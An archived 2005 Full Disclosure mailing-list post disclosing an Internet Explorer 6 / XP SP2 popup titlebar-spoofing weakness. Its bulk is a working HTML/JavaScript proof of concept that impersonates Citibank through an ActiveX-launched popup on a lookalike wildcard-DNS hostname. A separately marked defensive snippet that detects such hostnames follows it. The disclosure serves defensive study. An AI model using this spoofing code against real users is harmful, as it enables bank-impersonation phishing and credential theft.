Full Disclosure mailing list archives
WindowsXPSP2 script-initiated popup window titlebar spoofing
From: "bitlance winter" <bitlance_3 () hotmail com>
Date: Mon, 21 Feb 2005 03:47:53 +0000
Hi LIST.
Windows XP SP2 forces the titlebar to be present in script-initiated Internet Explorer windows.
In the titlebar, the domain name is listed before the page title. Using magic DNS, this domain name can be exploited by malicious people to trick users into visiting a malicious popup window. The weakness has been confirmed in version 6.0 on a fully patched system running Windows XP with SP2 installed.
Example:
- -----8<----- -----8<----- -----8<----- -----8<-----
[!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
[!-- saved from url=(0014)about:internet -->
[html lang="x-klingon">
[head>
[title>Welcome to Citibank[/title>
[meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
[meta http-equiv="Content-Script-Type" content="text/javascript">
[script type="text/javascript">
[!-- Begin
function shellscript()
{
window.focus();
pURL = 'http://securelogin.citibank.com"+".e-gold.com/';
sP = 'toolbar=0,scrollbars=0,location=0,statusbar=0,';
sP += 'menubar=0,resizable=0,width=315,';
sP += 'height=200,left = 250,top = 200'
day = new Date();
id = day.getTime();
eval("page" + id + " = window.open(pURL, '" + id + "',sP);");
}
function main()
{
targetURL = 'http://citibank.com/us/index.htm';
x.DOM.Script.execScript(shellscript.toString());
x.DOM.Script.setTimeout("shellscript()");
location.replace(targetURL);
}
setTimeout(' main() ',1000);
// End -->
[/script>
[/head>
[object id="x" classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A" width="1" height="1" align="middle"
[param name="ActivateApplets" value="1">
[param name="ActivateActiveXControls" value="1">
[/object>
[/body>
[/html>
- -----8<----- -----8<----- -----8<----- -----8<-----
Reference:
http-equiv (HOW TO BREAK XP SP2 POPUP BLOCKER)
http://www.securityfocus.com/archive/1/384037
REGARDS.
--
bitlance winter
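A defensive check for the hostname pattern in the message above, as an added example that is not part of the original post: it flags URLs whose hostname carries a protected domain as leading labels of a different domain, which is the text the forced titlebar would show first. The `PROTECTED` list, the function names and the sample URLs are assumptions made for illustration.

```javascript
'use strict';
// Added example, not from the original post.
// Assumption: the defender supplies the list of domains to protect.
const PROTECTED = ['citibank.com'];

// Lower-case the host, drop a trailing root dot, split into DNS labels.
function labelsOf(host) {
  return host.toLowerCase().replace(/\.$/, '').split('.');
}

// True when host is the domain itself or a genuine subdomain of it.
function belongsTo(host, domain) {
  const h = labelsOf(host).join('.');
  const d = labelsOf(domain).join('.');
  return h === d || h.endsWith('.' + d);
}

// Returns the protected domain that appears inside the hostname without
// owning it (its labels are followed by further labels), or null.
function embeddedDomain(urlString, protectedDomains = PROTECTED) {
  let host;
  try {
    host = new URL(urlString).hostname;
  } catch (e) {
    return null; // not a parseable absolute URL
  }
  const h = labelsOf(host);
  for (const domain of protectedDomains) {
    if (belongsTo(host, domain)) continue; // real subdomain: nothing to flag
    const d = labelsOf(domain);
    // Match whole labels only, and require at least one label after the match.
    for (let i = 0; i + d.length < h.length; i++) {
      if (d.every((label, j) => h[i + j] === label)) return domain;
    }
  }
  return null;
}

// Constructed sample URLs; the first uses the hostname pattern from the post.
const SAMPLES = [
  'http://securelogin.citibank.com.e-gold.com/',
  'http://citibank.com/us/index.htm',
  'https://www.citibank.com/',
  'http://notcitibank.com.example.net/',
];

// Keep only the URLs whose hostname embeds a protected domain.
function flagged(urls) {
  return urls.filter((u) => embeddedDomain(u) !== null);
}
console.log(flagged(SAMPLES));
```

Matching on whole DNS labels rather than substrings keeps `notcitibank.com.example.net` from being reported while still catching the wildcard-DNS form.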